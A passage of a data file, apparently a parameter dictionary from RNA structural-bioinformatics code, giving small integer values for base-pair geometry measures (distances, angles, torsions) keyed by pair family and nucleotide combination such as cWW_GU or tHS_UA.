"tHS_GC_tips_distance":5, "tHS_GC_C1'-B1-B1pair":2, "tHS_GC_B1-B1pair-C1'pair":2, "tHS_GC_C4'-C1'-B1-B1pair":2, "tHS_GC_B1-B1pair-C1'pair-C4'pair":3, "tHS_GC_alpha_1":2, "tHS_GC_alpha_2":2, "tHS_GC_dB1":2, "tHS_GC_dB2":2,
"cSS_GC_tips_distance":2, "cSS_GC_C1'-B1-B1pair":2, "cSS_GC_B1-B1pair-C1'pair":2, "cSS_GC_C4'-C1'-B1-B1pair":1, "cSS_GC_B1-B1pair-C1'pair-C4'pair":1, "cSS_GC_alpha_1":2, "cSS_GC_alpha_2":3, "cSS_GC_dB1":3, "cSS_GC_dB2":3,
"tSS_GC_tips_distance":5, "tSS_GC_C1'-B1-B1pair":2, "tSS_GC_B1-B1pair-C1'pair":2, "tSS_GC_C4'-C1'-B1-B1pair":1, "tSS_GC_B1-B1pair-C1'pair-C4'pair":2, "tSS_GC_alpha_1":2, "tSS_GC_alpha_2":3, "tSS_GC_dB1":2, "tSS_GC_dB2":1,
"cWW_GG_tips_distance":3, "cWW_GG_C1'-B1-B1pair":1, "cWW_GG_B1-B1pair-C1'pair":1, "cWW_GG_C4'-C1'-B1-B1pair":2, "cWW_GG_B1-B1pair-C1'pair-C4'pair":1, "cWW_GG_alpha_1":1, "cWW_GG_alpha_2":2, "cWW_GG_dB1":2, "cWW_GG_dB2":2,
"tWW_GG_tips_distance":4, "tWW_GG_C1'-B1-B1pair":1, "tWW_GG_B1-B1pair-C1'pair":1, "tWW_GG_C4'-C1'-B1-B1pair":2, "tWW_GG_B1-B1pair-C1'pair-C4'pair":2, "tWW_GG_alpha_1":2, "tWW_GG_alpha_2":2, "tWW_GG_dB1":1, "tWW_GG_dB2":2,
"cWH_GG_tips_distance":2, "cWH_GG_C1'-B1-B1pair":2, "cWH_GG_B1-B1pair-C1'pair":2, "cWH_GG_C4'-C1'-B1-B1pair":2, "cWH_GG_B1-B1pair-C1'pair-C4'pair":2, "cWH_GG_alpha_1":2, "cWH_GG_alpha_2":2, "cWH_GG_dB1":4, "cWH_GG_dB2":3,
"tWH_GG_tips_distance":2, "tWH_GG_C1'-B1-B1pair":1, "tWH_GG_B1-B1pair-C1'pair":2, "tWH_GG_C4'-C1'-B1-B1pair":2, "tWH_GG_B1-B1pair-C1'pair-C4'pair":2, "tWH_GG_alpha_1":2, "tWH_GG_alpha_2":2, "tWH_GG_dB1":2, "tWH_GG_dB2":3,
"cHW_GG_tips_distance":3, "cHW_GG_C1'-B1-B1pair":2, "cHW_GG_B1-B1pair-C1'pair":2, "cHW_GG_C4'-C1'-B1-B1pair":2, "cHW_GG_B1-B1pair-C1'pair-C4'pair":2, "cHW_GG_alpha_1":1, "cHW_GG_alpha_2":1, "cHW_GG_dB1":2, "cHW_GG_dB2":2,
"tHW_GG_tips_distance":4, "tHW_GG_C1'-B1-B1pair":2, "tHW_GG_B1-B1pair-C1'pair":2, "tHW_GG_C4'-C1'-B1-B1pair":1, "tHW_GG_B1-B1pair-C1'pair-C4'pair":2, "tHW_GG_alpha_1":2, "tHW_GG_alpha_2":2, "tHW_GG_dB1":1, "tHW_GG_dB2":4,
"cWS_GG_tips_distance":2, "cWS_GG_C1'-B1-B1pair":1, "cWS_GG_B1-B1pair-C1'pair":1, "cWS_GG_C4'-C1'-B1-B1pair":2, "cWS_GG_B1-B1pair-C1'pair-C4'pair":1, "cWS_GG_alpha_1":2, "cWS_GG_alpha_2":2, "cWS_GG_dB1":4, "cWS_GG_dB2":3,
"tWS_GG_tips_distance":8, "tWS_GG_C1'-B1-B1pair":3, "tWS_GG_B1-B1pair-C1'pair":2, "tWS_GG_C4'-C1'-B1-B1pair":3, "tWS_GG_B1-B1pair-C1'pair-C4'pair":2, "tWS_GG_alpha_1":1, "tWS_GG_alpha_2":1, "tWS_GG_dB1":1, "tWS_GG_dB2":3,
"cSW_GG_tips_distance":1, "cSW_GG_C1'-B1-B1pair":1, "cSW_GG_B1-B1pair-C1'pair":1, "cSW_GG_C4'-C1'-B1-B1pair":1, "cSW_GG_B1-B1pair-C1'pair-C4'pair":2, "cSW_GG_alpha_1":2, "cSW_GG_alpha_2":2, "cSW_GG_dB1":2, "cSW_GG_dB2":2,
"tSW_GG_tips_distance":5, "tSW_GG_C1'-B1-B1pair":3, "tSW_GG_B1-B1pair-C1'pair":2, "tSW_GG_C4'-C1'-B1-B1pair":3, "tSW_GG_B1-B1pair-C1'pair-C4'pair":2, "tSW_GG_alpha_1":1, "tSW_GG_alpha_2":3, "tSW_GG_dB1":2, "tSW_GG_dB2":1,
"cHH_GG_tips_distance":4, "cHH_GG_C1'-B1-B1pair":1, "cHH_GG_B1-B1pair-C1'pair":1, "cHH_GG_C4'-C1'-B1-B1pair":2, "cHH_GG_B1-B1pair-C1'pair-C4'pair":3, "cHH_GG_alpha_1":1, "cHH_GG_alpha_2":2, "cHH_GG_dB1":2, "cHH_GG_dB2":3,
"tHH_GG_tips_distance":8, "tHH_GG_C1'-B1-B1pair":2, "tHH_GG_B1-B1pair-C1'pair":2, "tHH_GG_C4'-C1'-B1-B1pair":2, "tHH_GG_B1-B1pair-C1'pair-C4'pair":3, "tHH_GG_alpha_1":2, "tHH_GG_alpha_2":2, "tHH_GG_dB1":2, "tHH_GG_dB2":3,
"cSH_GG_tips_distance":2, "cSH_GG_C1'-B1-B1pair":2, "cSH_GG_B1-B1pair-C1'pair":1, "cSH_GG_C4'-C1'-B1-B1pair":1, "cSH_GG_B1-B1pair-C1'pair-C4'pair":2, "cSH_GG_alpha_1":2, "cSH_GG_alpha_2":1, "cSH_GG_dB1":1, "cSH_GG_dB2":1,
"tSH_GG_tips_distance":2, "tSH_GG_C1'-B1-B1pair":2, "tSH_GG_B1-B1pair-C1'pair":2, "tSH_GG_C4'-C1'-B1-B1pair":2, "tSH_GG_B1-B1pair-C1'pair-C4'pair":2, "tSH_GG_alpha_1":2, "tSH_GG_alpha_2":2, "tSH_GG_dB1":1, "tSH_GG_dB2":2,
"cHS_GG_tips_distance":2, "cHS_GG_C1'-B1-B1pair":1, "cHS_GG_B1-B1pair-C1'pair":2, "cHS_GG_C4'-C1'-B1-B1pair":2, "cHS_GG_B1-B1pair-C1'pair-C4'pair":1, "cHS_GG_alpha_1":1, "cHS_GG_alpha_2":2, "cHS_GG_dB1":1, "cHS_GG_dB2":2,
"tHS_GG_tips_distance":2, "tHS_GG_C1'-B1-B1pair":2, "tHS_GG_B1-B1pair-C1'pair":2, "tHS_GG_C4'-C1'-B1-B1pair":2, "tHS_GG_B1-B1pair-C1'pair-C4'pair":1, "tHS_GG_alpha_1":2, "tHS_GG_alpha_2":3, "tHS_GG_dB1":2, "tHS_GG_dB2":1,
"cSS_GG_tips_distance":2, "cSS_GG_C1'-B1-B1pair":2, "cSS_GG_B1-B1pair-C1'pair":2, "cSS_GG_C4'-C1'-B1-B1pair":1, "cSS_GG_B1-B1pair-C1'pair-C4'pair":1, "cSS_GG_alpha_1":2, "cSS_GG_alpha_2":3, "cSS_GG_dB1":3, "cSS_GG_dB2":5,
"tSS_GG_tips_distance":2, "tSS_GG_C1'-B1-B1pair":3, "tSS_GG_B1-B1pair-C1'pair":2, "tSS_GG_C4'-C1'-B1-B1pair":2, "tSS_GG_B1-B1pair-C1'pair-C4'pair":1, "tSS_GG_alpha_1":1, "tSS_GG_alpha_2":3, "tSS_GG_dB1":3, "tSS_GG_dB2":2,
"cWW_GU_tips_distance":2, "cWW_GU_C1'-B1-B1pair":2, "cWW_GU_B1-B1pair-C1'pair":2, "cWW_GU_C4'-C1'-B1-B1pair":2, "cWW_GU_B1-B1pair-C1'pair-C4'pair":1, "cWW_GU_alpha_1":3, "cWW_GU_alpha_2":2, "cWW_GU_dB1":4, "cWW_GU_dB2":3,
"tWW_GU_tips_distance":2, "tWW_GU_C1'-B1-B1pair":3, "tWW_GU_B1-B1pair-C1'pair":2, "tWW_GU_C4'-C1'-B1-B1pair":2, "tWW_GU_B1-B1pair-C1'pair-C4'pair":3, "tWW_GU_alpha_1":2, "tWW_GU_alpha_2":2, "tWW_GU_dB1":3, "tWW_GU_dB2":3,
"cWH_GU_tips_distance":2, "cWH_GU_C1'-B1-B1pair":1, "cWH_GU_B1-B1pair-C1'pair":2, "cWH_GU_C4'-C1'-B1-B1pair":1, "cWH_GU_B1-B1pair-C1'pair-C4'pair":2, "cWH_GU_alpha_1":2, "cWH_GU_alpha_2":4, "cWH_GU_dB1":3, "cWH_GU_dB2":1,
"tWH_GU_tips_distance":8, "tWH_GU_C1'-B1-B1pair":1, "tWH_GU_B1-B1pair-C1'pair":2, "tWH_GU_C4'-C1'-B1-B1pair":2, "tWH_GU_B1-B1pair-C1'pair-C4'pair":2, "tWH_GU_alpha_1":2, "tWH_GU_alpha_2":2, "tWH_GU_dB1":3, "tWH_GU_dB2":1,
"cHW_GU_tips_distance":4, "cHW_GU_C1'-B1-B1pair":2, "cHW_GU_B1-B1pair-C1'pair":1, "cHW_GU_C4'-C1'-B1-B1pair":2, "cHW_GU_B1-B1pair-C1'pair-C4'pair":2, "cHW_GU_alpha_1":2, "cHW_GU_alpha_2":2, "cHW_GU_dB1":3, "cHW_GU_dB2":3,
"tHW_GU_tips_distance":1, "tHW_GU_C1'-B1-B1pair":3, "tHW_GU_B1-B1pair-C1'pair":1, "tHW_GU_C4'-C1'-B1-B1pair":2, "tHW_GU_B1-B1pair-C1'pair-C4'pair":3, "tHW_GU_alpha_1":3, "tHW_GU_alpha_2":1, "tHW_GU_dB1":2, "tHW_GU_dB2":5,
"cWS_GU_tips_distance":2, "cWS_GU_C1'-B1-B1pair":1, "cWS_GU_B1-B1pair-C1'pair":1, "cWS_GU_C4'-C1'-B1-B1pair":1, "cWS_GU_B1-B1pair-C1'pair-C4'pair":2, "cWS_GU_alpha_1":3, "cWS_GU_alpha_2":3, "cWS_GU_dB1":2, "cWS_GU_dB2":3,
"tWS_GU_tips_distance":4, "tWS_GU_C1'-B1-B1pair":3, "tWS_GU_B1-B1pair-C1'pair":1, "tWS_GU_C4'-C1'-B1-B1pair":3, "tWS_GU_B1-B1pair-C1'pair-C4'pair":2, "tWS_GU_alpha_1":1, "tWS_GU_alpha_2":2, "tWS_GU_dB1":3, "tWS_GU_dB2":3,
"cSW_GU_tips_distance":2, "cSW_GU_C1'-B1-B1pair":2, "cSW_GU_B1-B1pair-C1'pair":2, "cSW_GU_C4'-C1'-B1-B1pair":2, "cSW_GU_B1-B1pair-C1'pair-C4'pair":2, "cSW_GU_alpha_1":1, "cSW_GU_alpha_2":2, "cSW_GU_dB1":3, "cSW_GU_dB2":2,
"tSW_GU_tips_distance":3, "tSW_GU_C1'-B1-B1pair":1, "tSW_GU_B1-B1pair-C1'pair":2, "tSW_GU_C4'-C1'-B1-B1pair":2, "tSW_GU_B1-B1pair-C1'pair-C4'pair":2, "tSW_GU_alpha_1":1, "tSW_GU_alpha_2":2, "tSW_GU_dB1":5, "tSW_GU_dB2":1,
"cHH_GU_tips_distance":5, "cHH_GU_C1'-B1-B1pair":2, "cHH_GU_B1-B1pair-C1'pair":3, "cHH_GU_C4'-C1'-B1-B1pair":2, "cHH_GU_B1-B1pair-C1'pair-C4'pair":2, "cHH_GU_alpha_1":2, "cHH_GU_alpha_2":2, "cHH_GU_dB1":5, "cHH_GU_dB2":3,
"tHH_GU_tips_distance":5, "tHH_GU_C1'-B1-B1pair":2, "tHH_GU_B1-B1pair-C1'pair":1, "tHH_GU_C4'-C1'-B1-B1pair":1, "tHH_GU_B1-B1pair-C1'pair-C4'pair":2, "tHH_GU_alpha_1":2, "tHH_GU_alpha_2":1, "tHH_GU_dB1":8, "tHH_GU_dB2":2,
"cSH_GU_tips_distance":3, "cSH_GU_C1'-B1-B1pair":1, "cSH_GU_B1-B1pair-C1'pair":2, "cSH_GU_C4'-C1'-B1-B1pair":3, "cSH_GU_B1-B1pair-C1'pair-C4'pair":2, "cSH_GU_alpha_1":2, "cSH_GU_alpha_2":1, "cSH_GU_dB1":2, "cSH_GU_dB2":2,
"tSH_GU_tips_distance":2, "tSH_GU_C1'-B1-B1pair":2, "tSH_GU_B1-B1pair-C1'pair":2, "tSH_GU_C4'-C1'-B1-B1pair":1, "tSH_GU_B1-B1pair-C1'pair-C4'pair":1, "tSH_GU_alpha_1":2, "tSH_GU_alpha_2":3, "tSH_GU_dB1":3, "tSH_GU_dB2":3,
"cHS_GU_tips_distance":8, "cHS_GU_C1'-B1-B1pair":1, "cHS_GU_B1-B1pair-C1'pair":1, "cHS_GU_C4'-C1'-B1-B1pair":2, "cHS_GU_B1-B1pair-C1'pair-C4'pair":2, "cHS_GU_alpha_1":1, "cHS_GU_alpha_2":1, "cHS_GU_dB1":4, "cHS_GU_dB2":3,
"tHS_GU_tips_distance":5, "tHS_GU_C1'-B1-B1pair":4, "tHS_GU_B1-B1pair-C1'pair":2, "tHS_GU_C4'-C1'-B1-B1pair":2, "tHS_GU_B1-B1pair-C1'pair-C4'pair":1, "tHS_GU_alpha_1":2, "tHS_GU_alpha_2":1, "tHS_GU_dB1":1, "tHS_GU_dB2":3,
"cSS_GU_tips_distance":2, "cSS_GU_C1'-B1-B1pair":3, "cSS_GU_B1-B1pair-C1'pair":2, "cSS_GU_C4'-C1'-B1-B1pair":2, "cSS_GU_B1-B1pair-C1'pair-C4'pair":2, "cSS_GU_alpha_1":2, "cSS_GU_alpha_2":1, "cSS_GU_dB1":3, "cSS_GU_dB2":4,
"tSS_GU_tips_distance":5, "tSS_GU_C1'-B1-B1pair":2, "tSS_GU_B1-B1pair-C1'pair":2, "tSS_GU_C4'-C1'-B1-B1pair":1, "tSS_GU_B1-B1pair-C1'pair-C4'pair":3, "tSS_GU_alpha_1":2, "tSS_GU_alpha_2":2, "tSS_GU_dB1":2, "tSS_GU_dB2":6,
"cWW_UA_tips_distance":4, "cWW_UA_C1'-B1-B1pair":2, "cWW_UA_B1-B1pair-C1'pair":2, "cWW_UA_C4'-C1'-B1-B1pair":1, "cWW_UA_B1-B1pair-C1'pair-C4'pair":2, "cWW_UA_alpha_1":2, "cWW_UA_alpha_2":2, "cWW_UA_dB1":2, "cWW_UA_dB2":7,
"tWW_UA_tips_distance":2, "tWW_UA_C1'-B1-B1pair":1, "tWW_UA_B1-B1pair-C1'pair":2, "tWW_UA_C4'-C1'-B1-B1pair":2, "tWW_UA_B1-B1pair-C1'pair-C4'pair":1, "tWW_UA_alpha_1":2, "tWW_UA_alpha_2":1, "tWW_UA_dB1":6, "tWW_UA_dB2":1,
"cWH_UA_tips_distance":3, "cWH_UA_C1'-B1-B1pair":3, "cWH_UA_B1-B1pair-C1'pair":3, "cWH_UA_C4'-C1'-B1-B1pair":3, "cWH_UA_B1-B1pair-C1'pair-C4'pair":2, "cWH_UA_alpha_1":2, "cWH_UA_alpha_2":3, "cWH_UA_dB1":4, "cWH_UA_dB2":3,
"tWH_UA_tips_distance":3, "tWH_UA_C1'-B1-B1pair":2, "tWH_UA_B1-B1pair-C1'pair":1, "tWH_UA_C4'-C1'-B1-B1pair":2, "tWH_UA_B1-B1pair-C1'pair-C4'pair":2, "tWH_UA_alpha_1":1, "tWH_UA_alpha_2":2, "tWH_UA_dB1":3, "tWH_UA_dB2":2,
"cHW_UA_tips_distance":5, "cHW_UA_C1'-B1-B1pair":1, "cHW_UA_B1-B1pair-C1'pair":1, "cHW_UA_C4'-C1'-B1-B1pair":3, "cHW_UA_B1-B1pair-C1'pair-C4'pair":1, "cHW_UA_alpha_1":1, "cHW_UA_alpha_2":1, "cHW_UA_dB1":3, "cHW_UA_dB2":1,
"tHW_UA_tips_distance":7, "tHW_UA_C1'-B1-B1pair":3, "tHW_UA_B1-B1pair-C1'pair":2, "tHW_UA_C4'-C1'-B1-B1pair":1, "tHW_UA_B1-B1pair-C1'pair-C4'pair":2, "tHW_UA_alpha_1":3, "tHW_UA_alpha_2":3, "tHW_UA_dB1":2, "tHW_UA_dB2":1,
"cWS_UA_tips_distance":1, "cWS_UA_C1'-B1-B1pair":2, "cWS_UA_B1-B1pair-C1'pair":3, "cWS_UA_C4'-C1'-B1-B1pair":2, "cWS_UA_B1-B1pair-C1'pair-C4'pair":1, "cWS_UA_alpha_1":2, "cWS_UA_alpha_2":2, "cWS_UA_dB1":3, "cWS_UA_dB2":4,
"tWS_UA_tips_distance":5, "tWS_UA_C1'-B1-B1pair":1, "tWS_UA_B1-B1pair-C1'pair":2, "tWS_UA_C4'-C1'-B1-B1pair":2, "tWS_UA_B1-B1pair-C1'pair-C4'pair":1, "tWS_UA_alpha_1":1, "tWS_UA_alpha_2":3, "tWS_UA_dB1":1, "tWS_UA_dB2":1,
"cSW_UA_tips_distance":2, "cSW_UA_C1'-B1-B1pair":1, "cSW_UA_B1-B1pair-C1'pair":1, "cSW_UA_C4'-C1'-B1-B1pair":2, "cSW_UA_B1-B1pair-C1'pair-C4'pair":2, "cSW_UA_alpha_1":2, "cSW_UA_alpha_2":3, "cSW_UA_dB1":3, "cSW_UA_dB2":3,
"tSW_UA_tips_distance":2, "tSW_UA_C1'-B1-B1pair":1, "tSW_UA_B1-B1pair-C1'pair":2, "tSW_UA_C4'-C1'-B1-B1pair":1, "tSW_UA_B1-B1pair-C1'pair-C4'pair":1, "tSW_UA_alpha_1":2, "tSW_UA_alpha_2":2, "tSW_UA_dB1":3, "tSW_UA_dB2":2,
"cHH_UA_tips_distance":4, "cHH_UA_C1'-B1-B1pair":1, "cHH_UA_B1-B1pair-C1'pair":1, "cHH_UA_C4'-C1'-B1-B1pair":1, "cHH_UA_B1-B1pair-C1'pair-C4'pair":2, "cHH_UA_alpha_1":2, "cHH_UA_alpha_2":2, "cHH_UA_dB1":5, "cHH_UA_dB2":2,
"tHH_UA_tips_distance":4, "tHH_UA_C1'-B1-B1pair":2, "tHH_UA_B1-B1pair-C1'pair":2, "tHH_UA_C4'-C1'-B1-B1pair":2, "tHH_UA_B1-B1pair-C1'pair-C4'pair":2, "tHH_UA_alpha_1":2, "tHH_UA_alpha_2":3, "tHH_UA_dB1":3, "tHH_UA_dB2":1,
"cSH_UA_tips_distance":4, "cSH_UA_C1'-B1-B1pair":1, "cSH_UA_B1-B1pair-C1'pair":1, "cSH_UA_C4'-C1'-B1-B1pair":2, "cSH_UA_B1-B1pair-C1'pair-C4'pair":2, "cSH_UA_alpha_1":2, "cSH_UA_alpha_2":2, "cSH_UA_dB1":3, "cSH_UA_dB2":2,
"tSH_UA_tips_distance":2, "tSH_UA_C1'-B1-B1pair":2, "tSH_UA_B1-B1pair-C1'pair":2, "tSH_UA_C4'-C1'-B1-B1pair":3, "tSH_UA_B1-B1pair-C1'pair-C4'pair":2, "tSH_UA_alpha_1":3, "tSH_UA_alpha_2":2, "tSH_UA_dB1":4, "tSH_UA_dB2":1,
"cHS_UA_tips_distance":5, "cHS_UA_C1'-B1-B1pair":2, "cHS_UA_B1-B1pair-C1'pair":2, "cHS_UA_C4'-C1'-B1-B1pair":2, "cHS_UA_B1-B1pair-C1'pair-C4'pair":2, "cHS_UA_alpha_1":2, "cHS_UA_alpha_2":2, "cHS_UA_dB1":1, "cHS_UA_dB2":3,
"tHS_UA_tips_distance":5, "tHS_UA_C1'-B1-B1pair":2, "tHS_UA_B1-B1pair-C1'pair":2, "tHS_UA_C4'-C1'-B1-B1pair":3, "tHS_UA_B1-B1pair-C1'pair-C4'pair":1, "tHS_UA_alpha_1":3, "tHS_UA_alpha_2":3, "tHS_UA_dB1":2, "tHS_UA_dB2":7,
"cSS_UA_tips_distance":2, "cSS_UA_C1'-B1-B1pair":2, "cSS_UA_B1-B1pair-C1'pair":2, "cSS_UA_C4'-C1'-B1-B1pair":2, "cSS_UA_B1-B1pair-C1'pair-C4'pair":1, "cSS_UA_alpha_1":1, "cSS_UA_alpha_2":1, "cSS_UA_dB1":2, "cSS_UA_dB2":1,
"tSS_UA_tips_distance":5, "tSS_UA_C1'-B1-B1pair":1, "tSS_UA_B1-B1pair-C1'pair":3, "tSS_UA_C4'-C1'-B1-B1pair":2, "tSS_UA_B1-B1pair-C1'pair-C4'pair":3, "tSS_UA_alpha_1":2, "tSS_UA_alpha_2":2, "tSS_UA_dB1":4, "tSS_UA_dB2":4,
"cWW_UC_tips_distance":3, "cWW_UC_C1'-B1-B1pair":1, "cWW_UC_B1-B1pair-C1'pair":2, "cWW_UC_C4'-C1'-B1-B1pair":2, "cWW_UC_B1-B1pair-C1'pair-C4'pair":2, "cWW_UC_alpha_1":2, "cWW_UC_alpha_2":1, "cWW_UC_dB1":1, "cWW_UC_dB2":2,
"tWW_UC_tips_distance":4, "tWW_UC_C1'-B1-B1pair":2, "tWW_UC_B1-B1pair-C1'pair":2, "tWW_UC_C4'-C1'-B1-B1pair":2, "tWW_UC_B1-B1pair-C1'pair-C4'pair":2, "tWW_UC_alpha_1":3, "tWW_UC_alpha_2":1, "tWW_UC_dB1":1, "tWW_UC_dB2":4,
"cWH_UC_tips_distance":2, "cWH_UC_C1'-B1-B1pair":2, "cWH_UC_B1-B1pair-C1'pair":2, "cWH_UC_C4'-C1'-B1-B1pair":2, "cWH_UC_B1-B1pair-C1'pair-C4'pair":4, "cWH_UC_alpha_1":2, "cWH_UC_alpha_2":3, "cWH_UC_dB1":3, "cWH_UC_dB2":3,
"tWH_UC_tips_distance":4, "tWH_UC_C1'-B1-B1pair":3, "tWH_UC_B1-B1pair-C1'pair":2, "tWH_UC_C4'-C1'-B1-B1pair":3, "tWH_UC_B1-B1pair-C1'pair-C4'pair":1, "tWH_UC_alpha_1":4, "tWH_UC_alpha_2":1, "tWH_UC_dB1":4, "tWH_UC_dB2":2,
"cHW_UC_tips_distance":5, "cHW_UC_C1'-B1-B1pair":2, "cHW_UC_B1-B1pair-C1'pair":2, "cHW_UC_C4'-C1'-B1-B1pair":1, "cHW_UC_B1-B1pair-C1'pair-C4'pair":2, "cHW_UC_alpha_1":2, "cHW_UC_alpha_2":2, "cHW_UC_dB1":2, "cHW_UC_dB2":6,
"tHW_UC_tips_distance":2, "tHW_UC_C1'-B1-B1pair":2, "tHW_UC_B1-B1pair-C1'pair":2, "tHW_UC_C4'-C1'-B1-B1pair":3, "tHW_UC_B1-B1pair-C1'pair-C4'pair":2, "tHW_UC_alpha_1":2, "tHW_UC_alpha_2":4, "tHW_UC_dB1":4, "tHW_UC_dB2":4,
"cWS_UC_tips_distance":4, "cWS_UC_C1'-B1-B1pair":2, "cWS_UC_B1-B1pair-C1'pair":2, "cWS_UC_C4'-C1'-B1-B1pair":2, "cWS_UC_B1-B1pair-C1'pair-C4'pair":2, "cWS_UC_alpha_1":3, "cWS_UC_alpha_2":2, "cWS_UC_dB1":3, "cWS_UC_dB2":2,
"tWS_UC_tips_distance":4, "tWS_UC_C1'-B1-B1pair":2, "tWS_UC_B1-B1pair-C1'pair":1, "tWS_UC_C4'-C1'-B1-B1pair":2, "tWS_UC_B1-B1pair-C1'pair-C4'pair":2, "tWS_UC_alpha_1":2, "tWS_UC_alpha_2":1, "tWS_UC_dB1":3, "tWS_UC_dB2":2,
"cSW_UC_tips_distance":4, "cSW_UC_C1'-B1-B1pair":1, "cSW_UC_B1-B1pair-C1'pair":2, "cSW_UC_C4'-C1'-B1-B1pair":2, "cSW_UC_B1-B1pair-C1'pair-C4'pair":2, "cSW_UC_alpha_1":2, "cSW_UC_alpha_2":3, "cSW_UC_dB1":3, "cSW_UC_dB2":6,
"tSW_UC_tips_distance":5, "tSW_UC_C1'-B1-B1pair":1, "tSW_UC_B1-B1pair-C1'pair":2, "tSW_UC_C4'-C1'-B1-B1pair":3, "tSW_UC_B1-B1pair-C1'pair-C4'pair":1, "tSW_UC_alpha_1":2, "tSW_UC_alpha_2":2, "tSW_UC_dB1":2, "tSW_UC_dB2":1,
"cHH_UC_tips_distance":5, "cHH_UC_C1'-B1-B1pair":2, "cHH_UC_B1-B1pair-C1'pair":1, "cHH_UC_C4'-C1'-B1-B1pair":2, "cHH_UC_B1-B1pair-C1'pair-C4'pair":2, "cHH_UC_alpha_1":1, "cHH_UC_alpha_2":3, "cHH_UC_dB1":7, "cHH_UC_dB2":3,
"tHH_UC_tips_distance":5, "tHH_UC_C1'-B1-B1pair":1, "tHH_UC_B1-B1pair-C1'pair":1, "tHH_UC_C4'-C1'-B1-B1pair":2, "tHH_UC_B1-B1pair-C1'pair-C4'pair":3, "tHH_UC_alpha_1":2, "tHH_UC_alpha_2":2, "tHH_UC_dB1":8, "tHH_UC_dB2":8,
"cSH_UC_tips_distance":5, "cSH_UC_C1'-B1-B1pair":2, "cSH_UC_B1-B1pair-C1'pair":2, "cSH_UC_C4'-C1'-B1-B1pair":2, "cSH_UC_B1-B1pair-C1'pair-C4'pair":1, "cSH_UC_alpha_1":2, "cSH_UC_alpha_2":3, "cSH_UC_dB1":5, "cSH_UC_dB2":3,
"tSH_UC_tips_distance":2, "tSH_UC_C1'-B1-B1pair":1, "tSH_UC_B1-B1pair-C1'pair":1, "tSH_UC_C4'-C1'-B1-B1pair":2, "tSH_UC_B1-B1pair-C1'pair-C4'pair":1, "tSH_UC_alpha_1":2, "tSH_UC_alpha_2":2, "tSH_UC_dB1":2, "tSH_UC_dB2":7,
"cHS_UC_tips_distance":5, "cHS_UC_C1'-B1-B1pair":2, "cHS_UC_B1-B1pair-C1'pair":2, "cHS_UC_C4'-C1'-B1-B1pair":1, "cHS_UC_B1-B1pair-C1'pair-C4'pair":3, "cHS_UC_alpha_1":3, "cHS_UC_alpha_2":2, "cHS_UC_dB1":6, "cHS_UC_dB2":7,
"tHS_UC_tips_distance":5, "tHS_UC_C1'-B1-B1pair":3, "tHS_UC_B1-B1pair-C1'pair":2, "tHS_UC_C4'-C1'-B1-B1pair":2, "tHS_UC_B1-B1pair-C1'pair-C4'pair":3, "tHS_UC_alpha_1":3, "tHS_UC_alpha_2":1, "tHS_UC_dB1":5, "tHS_UC_dB2":7,
"cSS_UC_tips_distance":5, "cSS_UC_C1'-B1-B1pair":2, "cSS_UC_B1-B1pair-C1'pair":1, "cSS_UC_C4'-C1'-B1-B1pair":3, "cSS_UC_B1-B1pair-C1'pair-C4'pair":1, "cSS_UC_alpha_1":3, "cSS_UC_alpha_2":3, "cSS_UC_dB1":8, "cSS_UC_dB2":5,
"tSS_UC_tips_distance":5, "tSS_UC_C1'-B1-B1pair":2, "tSS_UC_B1-B1pair-C1'pair":1, "tSS_UC_C4'-C1'-B1-B1pair":3, "tSS_UC_B1-B1pair-C1'pair-C4'pair":3, "tSS_UC_alpha_1":3, "tSS_UC_alpha_2":1, "tSS_UC_dB1":8, "tSS_UC_dB2":7,
"cWW_UG_tips_distance":3, "cWW_UG_C1'-B1-B1pair":2, "cWW_UG_B1-B1pair-C1'pair":3, "cWW_UG_C4'-C1'-B1-B1pair":2, "cWW_UG_B1-B1pair-C1'pair-C4'pair":2, "cWW_UG_alpha_1":2, "cWW_UG_alpha_2":3, "cWW_UG_dB1":4, "cWW_UG_dB2":3,
"tWW_UG_tips_distance":2, "tWW_UG_C1'-B1-B1pair":1, "tWW_UG_B1-B1pair-C1'pair":1, "tWW_UG_C4'-C1'-B1-B1pair":2, "tWW_UG_B1-B1pair-C1'pair-C4'pair":2, "tWW_UG_alpha_1":3, "tWW_UG_alpha_2":3, "tWW_UG_dB1":3, "tWW_UG_dB2":4,
"cWH_UG_tips_distance":2, "cWH_UG_C1'-B1-B1pair":1, "cWH_UG_B1-B1pair-C1'pair":2, "cWH_UG_C4'-C1'-B1-B1pair":2, "cWH_UG_B1-B1pair-C1'pair-C4'pair":2, "cWH_UG_alpha_1":2, "cWH_UG_alpha_2":2, "cWH_UG_dB1":2, "cWH_UG_dB2":2,
"tWH_UG_tips_distance":1, "tWH_UG_C1'-B1-B1pair":2, "tWH_UG_B1-B1pair-C1'pair":2, "tWH_UG_C4'-C1'-B1-B1pair":2, "tWH_UG_B1-B1pair-C1'pair-C4'pair":2, "tWH_UG_alpha_1":2, "tWH_UG_alpha_2":2, "tWH_UG_dB1":6, "tWH_UG_dB2":2,
"cHW_UG_tips_distance":2, "cHW_UG_C1'-B1-B1pair":2, "cHW_UG_B1-B1pair-C1'pair":2, "cHW_UG_C4'-C1'-B1-B1pair":1, "cHW_UG_B1-B1pair-C1'pair-C4'pair":2, "cHW_UG_alpha_1":1, "cHW_UG_alpha_2":2, "cHW_UG_dB1":4, "cHW_UG_dB2":4,
"tHW_UG_tips_distance":1, "tHW_UG_C1'-B1-B1pair":2, "tHW_UG_B1-B1pair-C1'pair":1, "tHW_UG_C4'-C1'-B1-B1pair":2, "tHW_UG_B1-B1pair-C1'pair-C4'pair":2, "tHW_UG_alpha_1":3, "tHW_UG_alpha_2":2, "tHW_UG_dB1":6, "tHW_UG_dB2":3,
"cWS_UG_tips_distance":2, "cWS_UG_C1'-B1-B1pair":4, "cWS_UG_B1-B1pair-C1'pair":2, "cWS_UG_C4'-C1'-B1-B1pair":3, "cWS_UG_B1-B1pair-C1'pair-C4'pair":2, "cWS_UG_alpha_1":2, "cWS_UG_alpha_2":2, "cWS_UG_dB1":2, "cWS_UG_dB2":2,
"tWS_UG_tips_distance":5, "tWS_UG_C1'-B1-B1pair":2, "tWS_UG_B1-B1pair-C1'pair":2, "tWS_UG_C4'-C1'-B1-B1pair":2, "tWS_UG_B1-B1pair-C1'pair-C4'pair":2, "tWS_UG_alpha_1":2, "tWS_UG_alpha_2":1, "tWS_UG_dB1":3, "tWS_UG_dB2":5,
